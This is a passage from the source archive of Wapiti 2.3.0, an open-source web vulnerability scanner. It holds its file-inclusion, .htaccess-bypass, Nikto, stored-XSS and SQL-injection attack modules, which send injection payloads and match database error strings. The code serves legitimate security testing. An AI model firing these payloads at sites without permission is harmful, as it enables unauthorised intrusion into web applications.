self.logAnom(category=Anomaly.RES_CONSUMPTION, level=Anomaly.MEDIUM_LEVEL, request=evil_req, info=Anomaly.MSG_QS_TIMEOUT) self.logO(Anomaly.MSG_TIMEOUT, page) self.logO(Anomaly.MSG_EVIL_URL, evil_req.url) timeouted = True else: err, inc, warn = self.__findPatternInResponse(data, warn) if err != "": self.logVuln(category=Vulnerability.FILE_HANDLING, level=Vulnerability.HIGH_LEVEL, request=evil_req, info=_("{0} via injection in the query string").format(err)) self.logR(Vulnerability.MSG_QS_INJECT, err, page) self.logR(Vulnerability.MSG_EVIL_URL, evil_req.url) if inc: break else: if code == "500" and err500 == 0: err500 = 1 self.logAnom(category=Anomaly.ERROR_500, level=Anomaly.HIGH_LEVEL, request=evil_req, info=Anomaly.MSG_QS_500) self.logO(Anomaly.MSG_500, evil_req.path) self.logO(Anomaly.MSG_EVIL_URL, evil_req.url) for i in range(len(params_list)): timeouted = False warn = 0 inc = 0 err500 = 0 param_name = self.HTTP.quote(params_list[i][0]) saved_value = params_list[i][1] if saved_value is None: saved_value = "" params_list[i][1] = "__FILE__" url = page + "?" + self.HTTP.encode(params_list) if url not in self.attackedGET: self.attackedGET.append(url) for payload in self.payloads: err = "" payload = payload.replace('[VALUE]', saved_value) payload = payload.replace('[DIRVALUE]', saved_value.rsplit('/', 1)[0]) payload = payload.replace('[FILE_NAME]', http_res.file_name) params_list[i][1] = self.HTTP.quote(payload) url = page + "?" + self.HTTP.encode(params_list) if self.verbose == 2: print(u"+ {0}".format(url)) evil_req = HTTP.HTTPResource(url) try: data, code = self.HTTP.send(evil_req, headers=headers).getPageCode() except requests.exceptions.Timeout: if timeouted: continue data = "" code = "408" err = "" self.logAnom(category=Anomaly.RES_CONSUMPTION, level=Anomaly.MEDIUM_LEVEL, request=evil_req, parameter=param_name, info=Anomaly.MSG_PARAM_TIMEOUT.format(param_name)) self.logO(Anomaly.MSG_TIMEOUT, page) self.logO(Anomaly.MSG_EVIL_URL, evil_req.url) timeouted = True else: err, inc, warn = self.__findPatternInResponse(data, warn) if err != "": self.logVuln(category=Vulnerability.FILE_HANDLING, level=Vulnerability.HIGH_LEVEL, request=evil_req, parameter=param_name, info=_("{0} via injection in the parameter {1}").format(err, param_name)) self.logR(Vulnerability.MSG_PARAM_INJECT, err, page, param_name) self.logR(Vulnerability.MSG_EVIL_URL, evil_req.url) if inc: break else: if code == "500" and err500 == 0: err500 = 1 self.logAnom(category=Anomaly.ERROR_500, level=Anomaly.HIGH_LEVEL, request=evil_req, parameter=param_name, info=Anomaly.MSG_PARAM_500.format(param_name)) self.logO(Anomaly.MSG_500, evil_req.path) self.logO(Anomaly.MSG_EVIL_URL, evil_req.url) params_list[i][1] = saved_value def attackPOST(self, form): """This method performs the file handling attack with method POST""" # copies get_params = form.get_params post_params = form.post_params file_params = form.file_params referer = form.referer err = "" for params_list in [get_params, post_params, file_params]: for i in xrange(len(params_list)): timeouted = False warn = 0 inc = 0 err500 = 0 saved_value = params_list[i][1] if saved_value is None: saved_value = "" param_name = self.HTTP.quote(params_list[i][0]) if params_list is file_params: params_list[i][1] = ["_FILE__", params_list[i][1][1]] else: params_list[i][1] = "__FILE__" attack_pattern = HTTP.HTTPResource(form.path, method=form.method, get_params=get_params, post_params=post_params, file_params=file_params) if attack_pattern not in self.attackedPOST: self.attackedPOST.append(attack_pattern) for payload in self.payloads: payload = payload.replace('[FILE_NAME]', form.file_name) if params_list is file_params: payload = payload.replace('[VALUE]', saved_value[0]) payload = payload.replace('[DIRVALUE]', saved_value[0].rsplit('/', 1)[0]) params_list[i][1][0] = payload else: payload = payload.replace('[VALUE]', saved_value) payload = payload.replace('[DIRVALUE]', saved_value.rsplit('/', 1)[0]) params_list[i][1] = payload evil_req = HTTP.HTTPResource(form.path, method=form.method, get_params=get_params, post_params=post_params, file_params=file_params, referer=referer) if self.verbose == 2: print(u"+ {0}".format(evil_req)) try: data, code = self.HTTP.send(evil_req).getPageCode() except requests.exceptions.Timeout: if timeouted: continue data = "" code = "408" self.logAnom(category=Anomaly.RES_CONSUMPTION, level=Anomaly.MEDIUM_LEVEL, request=evil_req, parameter=param_name, info=Anomaly.MSG_PARAM_TIMEOUT.format(param_name)) self.logO(Anomaly.MSG_TIMEOUT, evil_req.path) self.logO(Anomaly.MSG_EVIL_REQUEST) self.logC(evil_req.http_repr) print('') timeouted = True else: err, inc, warn = self.__findPatternInResponse(data, warn) if err != "": info_msg = _("{0} via injection in the parameter {1}") self.logVuln(category=Vulnerability.FILE_HANDLING, level=Vulnerability.HIGH_LEVEL, request=evil_req, parameter=param_name, info=info_msg.format(err, param_name)) self.logR(Vulnerability.MSG_PARAM_INJECT, err, evil_req.url, param_name) self.logR(Vulnerability.MSG_EVIL_REQUEST) self.logC(evil_req.http_repr) print('') if inc: break else: if code == "500" and err500 == 0: err500 = 1 self.logAnom(category=Anomaly.ERROR_500, level=Anomaly.HIGH_LEVEL, request=evil_req, parameter=param_name, info=Anomaly.MSG_PARAM_500.format(param_name)) self.logO(Anomaly.MSG_500, evil_req.url) self.logO(Anomaly.MSG_EVIL_REQUEST) self.logC(evil_req.http_repr) print('') params_list[i][1] = saved_value wapiti-2.3.0+dfsg/wapitiCore/attack/mod_htaccess.py000066400000000000000000000072341240201516300223130ustar00rootroot00000000000000#!/usr/bin/env python # -*- coding: utf-8 -*- # This file is part of the Wapiti project (http://wapiti.sourceforge.net) # Copyright (C) 2009-2013 Nicolas Surribas # # Original authors : # Anthony DUBOCAGE # Guillaume TRANCHANT # Gregory FONTAINE # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA from wapitiCore.attack.attack import Attack from wapitiCore.language.vulnerability import Vulnerability, Anomaly from wapitiCore.net import HTTP class mod_htaccess(Attack): """ This class implements a htaccess attack """ name = "htaccess" doGET = False doPOST = False def __init__(self, http, xmlRepGenerator): Attack.__init__(self, http, xmlRepGenerator) #this function return code signification when htaccess protection enabled def __returnErrorByCode(self, code): err = "" code = int(code) if code == 401: err = "Authorization Required" elif code == 402: err = "Payment Required" elif code == 403: err = "Forbidden" else: err = "ok" return err def attackGET(self, http_res): url = http_res.path resp_headers = http_res.headers referer = http_res.referer headers = {} if referer: headers["referer"] = referer if url not in self.attackedGET: if self.verbose == 2: print(u"+ {0}".format(url)) err1 = self.__returnErrorByCode(resp_headers["status_code"]) if err1 != "ok": test_req = HTTP.HTTPResource(url) data1 = self.HTTP.send(test_req, headers=headers).getPage() # .htaccess protection detected if self.verbose >= 1: self.log(_("HtAccess protection found: {0}"), url) evil_req = HTTP.HTTPResource(url, method="ABC") data2, code2 = self.HTTP.send(evil_req, headers=headers).getPageCode() err2 = self.__returnErrorByCode(code2) if err2 == "ok": # .htaccess bypass success if self.verbose >= 1: self.logC(_("|HTTP Code: {0} : {1}"), resp_headers["status_code"], err1) if self.verbose == 2: self.logY(_("Source code:")) self.logW(data1) self.logVuln(category=Vulnerability.HTACCESS, level=Vulnerability.HIGH_LEVEL, request=evil_req, info=_("{0} HtAccess").format(err1)) self.logR(_(" .htaccess bypass vulnerability: {0}"), evil_req.url) # print output informations by verbosity option if self.verbose >= 1: self.logC(_("|HTTP Code: {0}"), code2) if self.verbose == 2: self.logY(_("Source code:")) self.logW(data2) self.attackedGET.append(url) wapiti-2.3.0+dfsg/wapitiCore/attack/mod_nikto.py000066400000000000000000000220401240201516300216320ustar00rootroot00000000000000#!/usr/bin/env python # -*- coding: utf-8 -*- # This file is part of the Wapiti project (http://wapiti.sourceforge.net) # Copyright (C) 2009-2013 Nicolas Surribas # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA import csv import re import os import socket import random import BeautifulSoup from wapitiCore.attack.attack import Attack from wapitiCore.language.vulnerability import Vulnerability from wapitiCore.net import HTTP # Nikto databases are csv files with the following fields (in order) : # # 1 - A unique indenfier (number) # 2 - The OSVDB reference number of the vulnerability # 3 - Unknown (not used by Wapiti) # 4 - The URL to check for. May contain a pattern to replace (eg: @CGIDIRS) # 5 - The HTTP method to use when requesting the URL # 6 - The HTTP status code returned when the vulnerability may exist # or a string the HTTP response may contain. # 7 - Another condition for a possible vulnerability (6 OR 7) # 8 - Another condition (must match for a possible vulnerability) # 9 - A condition corresponding to an unexploitable webpage #10 - Another condition just like 9 #11 - A description of the vulnerability with possible BID, CVE or MS references #12 - A url-form-encoded string (usually for POST requests) # # A possible vulnerability is reported in the following condition : # ((6 or 7) and 8) and not (9 or 10) class mod_nikto(Attack): """ This class implements a Nikto attack """ nikto_db = [] name = "nikto" CONFIG_FILE = "nikto_db" doGET = False doPOST = False def __init__(self, http, xmlRepGenerator): Attack.__init__(self, http, xmlRepGenerator) user_config_dir = os.getenv('HOME') or os.getenv('USERPROFILE') user_config_dir += "/config" if not os.path.isdir(user_config_dir): os.makedirs(user_config_dir) try: fd = open(os.path.join(user_config_dir, self.CONFIG_FILE)) reader = csv.reader(fd) self.nikto_db = [l for l in reader if l != [] and l[0].isdigit()] fd.close() except IOError: try: print(_("Problem with local nikto database.")) print(_("Downloading from the web...")) nikto_req = HTTP.HTTPResource("http://cirt.net/nikto/UPDATES/2.1.5/db_tests") resp = self.HTTP.send(nikto_req) page = resp.getRawPage() csv.register_dialect("nikto", quoting=csv.QUOTE_ALL, doublequote=False, escapechar="\\") reader = csv.reader(page.split("\n"), "nikto") self.nikto_db = [l for l in reader if l != [] and l[0].isdigit()] fd = open(os.path.join(user_config_dir, self.CONFIG_FILE), "w") writer = csv.writer(fd) writer.writerows(self.nikto_db) fd.close() except socket.timeout: print(_("Error downloading Nikto database")) def attack(self, urls, forms): junk_string = "w" + "".join([random.choice("0123456789abcdefghjijklmnopqrstuvwxyz") for __ in range(0, 5000)]) for l in self.nikto_db: match = match_or = match_and = False fail = fail_or = False osv_id = l[1] path = l[3] method = l[4] vuln_desc = l[10] post_data = l[11] path = path.replace("@CGIDIRS", "/cgi-bin/") path = path.replace("@ADMIN", "/admin/") path = path.replace("@NUKE", "/modules/") path = path.replace("@PHPMYADMIN", "/phpMyAdmin/") path = path.replace("@POSTNUKE", "/postnuke/") path = re.sub("JUNK\((\d+)\)", lambda x: junk_string[:int(x.group(1))], path) if path[0] == "@": continue if path[0] != "/": path = "/" + path url = "" try: url = "http://" + self.HTTP.server + path except UnicodeDecodeError: continue evil_req = None if method == "GET": evil_req = HTTP.HTTPResource(url) elif method == "POST": evil_req = HTTP.HTTPResource(url, post_params=post_data, method=method) else: evil_req = HTTP.HTTPResource(url, post_params=post_data, method=method) if self.verbose == 2: try: if method == "GET": print(u"+ {0}".format(evil_req.url)) else: print(u"+ {0}".format(evil_req.http_repr)) except Exception, e: continue try: resp = self.HTTP.send(evil_req) except Exception, e: # requests bug print(e) continue page, code = resp.getPageCode() encoding = BeautifulSoup.BeautifulSoup(page).originalEncoding if encoding: page = unicode(page, encoding, "ignore") raw = " ".join([x + ": " + y for x, y in resp.getHeaders().items()]) raw += page # First condition (match) if len(l[5]) == 3 and l[5].isdigit(): if code == int(l[5]): match = True else: if l[5] in raw: match = True # Second condition (or) if l[6] != "": if len(l[6]) == 3 and l[6].isdigit(): if code == int(l[6]): match_or = True else: if l[6] in raw: match_or = True # Third condition (and) if l[7] != "": if len(l[7]) == 3 and l[7].isdigit(): if code == int(l[7]): match_and = True else: if l[7] in raw: match_and = True else: match_and = True # Fourth condition (fail) if l[8] != "": if len(l[8]) == 3 and l[8].isdigit(): if code == int(l[8]): fail = True else: if l[8] in raw: fail = True # Fifth condition (or) if l[9] != "": if len(l[9]) == 3 and l[9].isdigit(): if code == int(l[9]): fail_or = True else: if l[9] in raw: fail_or = True if ((match or match_or) and match_and) and not (fail or fail_or): print(url) print(vuln_desc) refs = [] if osv_id != "0": refs.append("http://osvdb.org/show/osvdb/" + osv_id) # CERT m = re.search("(CA\-[0-9]{4}-[0-9]{2})", vuln_desc) if m is not None: refs.append("http://www.cert.org/advisories/" + m.group(0) + ".html") # SecurityFocus m = re.search("BID\-([0-9]{4})", vuln_desc) if m is not None: refs.append("http://www.securityfocus.com/bid/" + m.group(1)) # Mitre.org m = re.search("((CVE|CAN)\-[0-9]{4}-[0-9]{4})", vuln_desc) if m is not None: refs.append("http://cve.mitre.org/cgi-bin/cvename.cgi?name=" + m.group(0)) # CERT Incidents m = re.search("(IN\-[0-9]{4}\-[0-9]{2})", vuln_desc) if m is not None: refs.append("http://www.cert.org/incident_notes/" + m.group(0) + ".html") # Microsoft Technet m = re.search("(MS[0-9]{2}\-[0-9]{3})", vuln_desc) if m is not None: refs.append("http://www.microsoft.com/technet/security/bulletin/" + m.group(0) + ".asp") info = vuln_desc if refs != []: print(_("References:")) print(u" {0}".format(u"\n ".join(refs))) info += "\n" + _("References:") + "\n" info += "\n".join(['' + x + '' for x in refs]) print('') self.logVuln(category=Vulnerability.NIKTO, level=Vulnerability.HIGH_LEVEL, request=evil_req, info=info) wapiti-2.3.0+dfsg/wapitiCore/attack/mod_permanentxss.py000066400000000000000000000447301240201516300232470ustar00rootroot00000000000000#!/usr/bin/env python # -*- coding: utf-8 -*- # This file is part of the Wapiti project (http://wapiti.sourceforge.net) # Copyright (C) 2008-2013 Nicolas Surribas # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA import socket import requests import os from wapitiCore.attack.attack import Attack from wapitiCore.language.vulnerability import Vulnerability, Anomaly from wapitiCore.net import HTTP class mod_permanentxss(Attack): """ This class implements a cross site scripting attack """ # magic strings we must see to be sure script is vulnerable to XSS # payloads must be created on those paterns script_ok = ["alert('__XSS__')", "alert(\"__XSS__\")", "String.fromCharCode(0,__XSS__,1)"] # simple payloads that doesn't rely on their position in the DOM structure # payloads injected after closing a tag aatibute value (attrval) or in the # content of a tag (text node like beetween

and

) # only trick here must be on character encoding, filter bypassing, stuff like that # form the simplest to the most complex, Wapiti will stop on the first working independant_payloads = [] name = "permanentxss" require = ["xss"] PRIORITY = 6 HTTP = None # two dict for permanent XSS scanning GET_XSS = {} POST_XSS = {} # key = xss code, valud = payload SUCCESSFUL_XSS = {} CONFIG_FILE = "xssPayloads.txt" MSG_VULN = _("Stored XSS vulnerability") def __init__(self, http, xmlRepGenerator): Attack.__init__(self, http, xmlRepGenerator) self.independant_payloads = self.loadPayloads(os.path.join(self.CONFIG_DIR, self.CONFIG_FILE)) # permanent XSS def attack(self, get_resources, forms): """This method searches XSS which could be permanently stored in the web application""" for http_resource in get_resources: if http_resource.method != "GET": continue url = http_resource.url target_req = HTTP.HTTPResource(url) page = http_resource.path referer = http_resource.referer headers = {} if referer: headers["referer"] = referer if self.verbose >= 1: print(u"+ {0}".format(url)) try: resp = self.HTTP.send(target_req, headers=headers) data = resp.getPage() except requests.exceptions.Timeout, timeout: data = "" resp = timeout except socket.error, se: data = "" resp = None print(_('error: {0} while attacking {1}').format(repr(str(se[1])), url)) except Exception, e: print(_('error: {0} while attacking {1}').format(repr(str(e[0])), url)) continue # Search for permanent XSS vulns which were injected via GET if self.doGET == 1: for code in self.GET_XSS: if code in data: # code found in the webpage ! code_url = self.GET_XSS[code][0].url page = self.GET_XSS[code][0].path param_name = self.GET_XSS[code][1] if code in self.SUCCESSFUL_XSS: # is this an already known vuln (reflected XSS) if self.validXSS(data, code, self.SUCCESSFUL_XSS[code]): # if we can find the payload again, this is a stored XSS evil_req = HTTP.HTTPResource(code_url.replace(code, self.SUCCESSFUL_XSS[code])) if param_name == "QUERY_STRING": self.logR(Vulnerability.MSG_QS_INJECT, self.MSG_VULN, page) else: self.logR(Vulnerability.MSG_PARAM_INJECT, self.MSG_VULN, page, param_name) self.logR(Vulnerability.MSG_EVIL_URL, code_url) self.logVuln(category=Vulnerability.XSS, level=Vulnerability.HIGH_LEVEL, request=evil_req, info=_("Found permanent XSS in {0}" " with {1}").format(page, self.HTTP.escape(evil_req.url))) # we reported the vuln, now search another code continue # we where able to inject the ID but will we be able to inject javascript? else: timeouted = False returned500 = False for xss in self.independant_payloads: payload = xss.replace("__XSS__", code) evil_req = HTTP.HTTPResource(code_url.replace(code, payload)) try: http_code = self.HTTP.send(evil_req).getCode() dat = resp = self.HTTP.send(target_req).getPage() except requests.exceptions.Timeout: dat = "" if timeouted: continue self.logO(Anomaly.MSG_TIMEOUT, evil_req.url) self.logO(Anomaly.MSG_EVIL_REQUEST) self.logC(evil_req.http_repr) print('') self.logAnom(category=Anomaly.RES_CONSUMPTION, level=Anomaly.MEDIUM_LEVEL, request=evil_req, parameter=param_name, info=Anomaly.MSG_PARAM_TIMEOUT.format(param_name)) timeouted = True except Exception, e: print(_('error: {0} while attacking {1}').format(repr(str(e[0])), url)) continue if self.validXSS(dat, code, payload): # injection successful :) if param_name == "QUERY_STRING": self.logR(Vulnerability.MSG_QS_INJECT, self.MSG_VULN, page) else: self.logR(Vulnerability.MSG_PARAM_INJECT, self.MSG_VULN, page, param_name) self.logR(Vulnerability.MSG_EVIL_URL, evil_req.url) self.logVuln(category=Vulnerability.XSS, level=Vulnerability.HIGH_LEVEL, request=evil_req, info=_("Found permanent XSS in {0}" " with {1}").format(url, self.HTTP.escape(evil_req.url))) # look for another code in the webpage break elif http_code == "500" and not returned500: self.logAnom(category=Anomaly.ERROR_500, level=Anomaly.HIGH_LEVEL, request=evil_req, parameter=param_name, info=Anomaly.MSG_PARAM_500.format(param_name)) self.logO(Anomaly.MSG_500, evil_req.url) self.logO(Vulnerability.MSG_EVIL_REQUEST) self.logC(evil_req.http_repr) print('') returned500 = True if self.doPOST == 1: for code in self.POST_XSS: if code in data: # code found in the webpage if code in self.SUCCESSFUL_XSS: # this code has been used in a successful attack if self.validXSS(data, code, self.SUCCESSFUL_XSS[code]): code_req = self.POST_XSS[code][0] get_params = code_req.get_params post_params = code_req.post_params file_params = code_req.file_params referer = code_req.referer for params_list in [get_params, post_params, file_params]: for i in xrange(len(params_list)): param_name, v = params_list[i] param_name = self.HTTP.quote(param_name) if v == code: if params_list is file_params: params_list[i][1][0] = self.SUCCESSFUL_XSS[code] else: params_list[i][1] = self.SUCCESSFUL_XSS[code] # we found the xss payload again -> stored xss vuln evil_req = HTTP.HTTPResource(code_req.path, method="POST", get_params=get_params, post_params=post_params, file_params=file_params, referer=referer) self.logVuln(category=Vulnerability.XSS, level=Vulnerability.HIGH_LEVEL, request=evil_req, parameter=param_name, info=_("Found permanent XSS attacked by {0} with fields" " {1}").format(evil_req.url, self.HTTP.encode(post_params))) self.logR(Vulnerability.MSG_PARAM_INJECT, self.MSG_VULN, evil_req.path, param_name) self.logR(Vulnerability.MSG_EVIL_REQUEST) self.logC(evil_req.http_repr) print('') # search for the next code in the webpage continue # we found the code but no attack was made # let's try to break in else: code_req = self.POST_XSS[code][0] get_params = code_req.get_params post_params = code_req.post_params file_params = code_req.file_params referer = code_req.referer for params_list in [get_params, post_params, file_params]: for i in xrange(len(params_list)): param_name, v = params_list[i] param_name = self.HTTP.quote(param_name) if v == code: timeouted = False returned500 = False for xss in self.independant_payloads: payload = xss.replace("__XSS__", code) if params_list is file_params: params_list[i][1][0] = payload else: params_list[i][1] = payload try: evil_req = HTTP.HTTPResource(code_req.path, method=code_req.method, get_params=get_params, post_params=post_params, file_params=file_params, referer=referer) http_code = self.HTTP.send(evil_req).getCode() dat = self.HTTP.send(target_req).getPage() except requests.exceptions.Timeout: dat = "" if timeouted: continue self.logO(Anomaly.MSG_TIMEOUT, evil_req.url) self.logO(Anomaly.MSG_EVIL_REQUEST) self.logC(evil_req.http_repr) print('') self.logAnom(category=Anomaly.RES_CONSUMPTION, level=Anomaly.MEDIUM_LEVEL, request=evil_req, parameter=param_name, info=Anomaly.MSG_PARAM_TIMEOUT.format(param_name)) timeouted = True except Exception, e: print(_('error: {0} while attacking {1}') .format(repr(str(e[0])), url)) continue if self.validXSS(dat, code, payload): self.logVuln(category=Vulnerability.XSS, level=Vulnerability.HIGH_LEVEL, request=evil_req, parameter=param_name, info=_("Found permanent XSS attacked by {0} with fields" " {1}").format(evil_req.url, self.HTTP.encode(post_params))) self.logR(Vulnerability.MSG_PARAM_INJECT, self.MSG_VULN, evil_req.path, param_name) self.logR(Vulnerability.MSG_EVIL_REQUEST) self.logC(evil_req.http_repr) print('') break elif http_code == "500" and not returned500: self.logAnom(category=Anomaly.ERROR_500, level=Anomaly.HIGH_LEVEL, request=evil_req, parameter=param_name, info=Anomaly.MSG_PARAM_500.format(param_name)) self.logO(Anomaly.MSG_500, evil_req.url) self.logO(Vulnerability.MSG_EVIL_REQUEST) self.logC(evil_req.http_repr) print('') returned500 = True # check weither our JS payload is injected in the webpage def validXSS(self, page, code, payload): if page is None or page == "": return False if payload.lower() in page.lower(): return True return False def validContentType(self, http_res): """Check wether the returned content-type header allow javascript evaluation.""" if not "content-type" in http_res.headers: return True if "text/html" in http_res.headers["content-type"]: return True return False def loadRequire(self, obj=[]): self.deps = obj for x in self.deps: if x.name == "xss": self.GET_XSS = x.GET_XSS self.POST_XSS = x.POST_XSS self.SUCCESSFUL_XSS = x.SUCCESSFUL_XSS wapiti-2.3.0+dfsg/wapitiCore/attack/mod_sql.py000066400000000000000000000311021240201516300213040ustar00rootroot00000000000000#!/usr/bin/env python # -*- coding: utf-8 -*- # This file is part of the Wapiti project (http://wapiti.sourceforge.net) # Copyright (C) 2008-2013 Nicolas Surribas # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA import re from wapitiCore.attack.attack import Attack from wapitiCore.language.vulnerability import Vulnerability, Anomaly import requests from wapitiCore.net import HTTP class mod_sql(Attack): """ This class implements an error-based SQL Injection attack """ TIME_TO_SLEEP = 6 name = "sql" def __init__(self, http, xmlRepGenerator): Attack.__init__(self, http, xmlRepGenerator) def __findPatternInResponse(self, data): if "You have an error in your SQL syntax" in data: return _("MySQL Injection") if "supplied argument is not a valid MySQL" in data: return _("MySQL Injection") if ("[Microsoft][ODBC Microsoft Access Driver]" in data or "Syntax error in string in query expression " in data): return _("Access-Based SQL Injection") if "[Microsoft][ODBC SQL Server Driver]" in data: return _("MSSQL-Based Injection") if 'Microsoft OLE DB Provider for ODBC Drivers error' in data: return _("MSSQL-Based Injection") if "Microsoft OLE DB Provider for ODBC Drivers" in data: return _("MSSQL-Based Injection") if "java.sql.SQLException: Syntax error or access violation" in data or \ "java.sql.SQLException: Unexpected end of command" in data: return _("Java.SQL Injection") if "PostgreSQL query failed: ERROR: parser:" in data: return _("PostgreSQL Injection") if "XPathException" in data: return _("XPath Injection") if "Warning: SimpleXMLElement::xpath():" in data: return _("XPath Injection") if "supplied argument is not a valid ldap" in data or "javax.naming.NameNotFoundException" in data: return _("LDAP Injection") if "DB2 SQL error:" in data: return _("DB2 Injection") if "Dynamic SQL Error" in data: return _("Interbase Injection") if "Sybase message:" in data: return _("Sybase Injection") if "Unclosed quotation mark after the character string" in data: return _(".NET SQL Injection") if "error '80040e14'" in data and "Incorrect syntax near" in data: return _("MSSQL-Based Injection") ora_test = re.search("ORA-[0-9]{4,}", data) if ora_test is not None: return _("Oracle Injection") + " " + ora_test.group(0) return "" def setTimeout(self, timeout): self.TIME_TO_SLEEP = str(1 + int(timeout)) def attackGET(self, http_res): """This method performs the SQL Injection attack with method GET""" page = http_res.path params_list = http_res.get_params resp_headers = http_res.headers referer = http_res.referer headers = {} if referer: headers["referer"] = referer # about this payload : http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string payload = "\xBF'\"(" vuln_found = 0 if not params_list: # Do not attack application-type files if not "content-type" in resp_headers: # Sometimes there's no content-type... so we rely on the document extension if (page.split(".")[-1] not in self.allowed) and page[-1] != "/": return elif not "text" in resp_headers["content-type"]: return err = "" payload = self.HTTP.quote(payload) url = page + "?" + payload if url not in self.attackedGET: self.attackedGET.append(url) evil_req = HTTP.HTTPResource(url) if self.verbose == 2: print(u"+ {0}".format(url)) try: resp = self.HTTP.send(evil_req, headers=headers) data, code = resp.getPageCode() except requests.exceptions.Timeout, timeout: # No timeout report here... launch blind sql detection later data = "" code = "408" err = "" resp = timeout else: err = self.__findPatternInResponse(data) if err != "": vuln_found += 1 self.logVuln(category=Vulnerability.SQL_INJECTION, level=Vulnerability.HIGH_LEVEL, request=evil_req, info=_("{0} via injection in the query string").format(err)) self.logR(Vulnerability.MSG_QS_INJECT, err, page) self.logR(Vulnerability.MSG_EVIL_URL, evil_req.url) self.vulnerableGET.append(page + "?" + "__SQL__") else: if code == "500": self.logAnom(category=Anomaly.ERROR_500, level=Anomaly.HIGH_LEVEL, request=evil_req, info=Anomaly.MSG_QS_500) self.logO(Anomaly.MSG_500, page) self.logO(Anomaly.MSG_EVIL_URL, evil_req.url) else: for i in range(len(params_list)): err = "" param_name = self.HTTP.quote(params_list[i][0]) saved_value = params_list[i][1] if saved_value is None: saved_value = "" params_list[i][1] = "__SQL__" pattern_url = page + "?" + self.HTTP.encode(params_list) if pattern_url not in self.attackedGET: self.attackedGET.append(pattern_url) params_list[i][1] = self.HTTP.quote(payload) url = page + "?" + self.HTTP.encode(params_list) evil_req = HTTP.HTTPResource(url) if self.verbose == 2: print(u"+ {0}".format(evil_req.url)) try: resp = self.HTTP.send(evil_req, headers=headers) data, code = resp.getPageCode() except requests.exceptions.Timeout, timeout: # No timeout report here... launch blind sql detection later data = "" code = "408" err = "" resp = timeout else: err = self.__findPatternInResponse(data) if err != "": self.logVuln(category=Vulnerability.SQL_INJECTION, level=Vulnerability.HIGH_LEVEL, request=evil_req, parameter=param_name, info=("{0} via injection in the parameter {1}").format(err, param_name)) self.logR(Vulnerability.MSG_PARAM_INJECT, err, page, param_name) self.logR(Vulnerability.MSG_EVIL_URL, evil_req.url) self.vulnerableGET.append(pattern_url) elif code == "500": self.logAnom(category=Anomaly.ERROR_500, level=Anomaly.HIGH_LEVEL, request=evil_req, parameter=param_name, info=Anomaly.MSG_PARAM_500.format(param_name)) self.logO(Anomaly.MSG_500, page) self.logO(Anomaly.MSG_EVIL_URL, evil_req.url) params_list[i][1] = saved_value def attackPOST(self, form): """This method performs the SQL Injection attack with method POST""" payload = "\xbf'\"(" filename_payload = "'\"(" err = "" # copies get_params = form.get_params post_params = form.post_params file_params = form.file_params referer = form.referer for params_list in [get_params, post_params, file_params]: for i in xrange(len(params_list)): saved_value = params_list[i][1] if saved_value is None: saved_value = "" if params_list is file_params: params_list[i][1] = ["_SQL__", params_list[i][1][1]] else: params_list[i][1] = "__SQL__" param_name = self.HTTP.quote(params_list[i][0]) attack_pattern = HTTP.HTTPResource(form.path, method=form.method, get_params=get_params, post_params=post_params, file_params=file_params) if attack_pattern not in self.attackedPOST: self.attackedPOST.append(attack_pattern) if params_list is file_params: params_list[i][1][0] = filename_payload else: params_list[i][1] = payload evil_req = HTTP.HTTPResource(form.path, method=form.method, get_params=get_params, post_params=post_params, file_params=file_params, referer=referer) if self.verbose == 2: print(u"+ {0}".format(evil_req)) try: resp = self.HTTP.send(evil_req) data, code = resp.getPageCode() except requests.exceptions.Timeout, timeout: # No timeout report here... launch blind sql detection later data = "" code = "408" resp = timeout else: err = self.__findPatternInResponse(data) if err != "": self.logVuln(category=Vulnerability.SQL_INJECTION, level=Vulnerability.HIGH_LEVEL, request=evil_req, parameter=param_name, info=_("{0} via injection in the parameter {1}").format(err, param_name)) self.logR(Vulnerability.MSG_PARAM_INJECT, err, evil_req.url, param_name) self.logR(Vulnerability.MSG_EVIL_REQUEST) self.logC(evil_req.http_repr) print('') self.vulnerablePOST.append(attack_pattern) else: if code == "500": self.logAnom(category=Anomaly.ERROR_500, level=Anomaly.HIGH_LEVEL, request=evil_req, parameter=param_name, info=Anomaly.MSG_PARAM_500.format(param_name)) self.logO(Anomaly.MSG_500, evil_req.url) self.logO(Anomaly.MSG_EVIL_REQUEST) self.logC(evil_req.http_repr) print('') params_list[i][1] = saved_value wapiti-2.3.0+dfsg/wapitiCore/attack/mod_xss.py000066400000000000000000000751131240201516300213340ustar00rootroot00000000000000#!/usr/bin/env python # -*- coding: utf-8 -*- # This file is part of the Wapiti project (http://wapiti.sourceforge.net) # Copyright (C) 2008-2013 Nicolas Surribas # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 